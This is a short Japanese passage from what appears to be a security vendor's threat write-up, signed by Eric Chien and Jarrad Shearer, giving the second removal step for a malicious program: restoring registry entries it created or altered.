2. レジストリの設定の復元 レジストリを改ざんするリスクは多く、侵入先のコンピュータの機能または処理速度に影響を与える可能性があります。改ざんの多くは、さまざまな Windows コンポーネントによって復元することができますが、レジストリの編集が必要な可能性があります。作成または改ざんされたレジストリキーに関する情報については、この文書の「テクニカルノート」を参照してください。このリスクによって作成されたレジストリサブキーとレジストリエントリを削除して、すべての改ざんされたレジストリエントリを以前の値に戻します。

記述: Eric Chien and Jarrad Shearer